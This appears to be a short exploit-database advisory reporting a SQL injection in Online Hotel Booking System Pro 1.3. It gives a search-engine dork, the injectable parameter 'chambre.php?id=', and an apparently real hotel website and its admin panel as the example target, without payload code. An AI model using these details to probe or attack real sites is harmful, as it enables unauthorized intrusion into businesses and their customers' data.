Online Hotel Booking System Pro version 1.3 suffers from a remote SQL injection vulnerability.
71ae79c1a63d41c4233e62f577d93985
====================================================================================================
| # Title : Online Hotel Booking System Pro 1.3 Sql injection vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Tested on : windows 10 FranASSais V.(Pro) |
| # Version : 1.3 |
| # Vendor : https://codecanyon.net/item/online-hotel-booking-system-pro/4606514 |
| # Dork : "booking-failure.php?error_code=" |
====================================================================================================
poc :
[+] Dorking Adegn Google Or Other Search Enggine
[+] Use Payload : chambre.php?id=
http://www.riadbahiasalam.com/chambre.php?id= <====== inject her
Panel : http://www.riadbahiasalam.com/cp/index.php
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================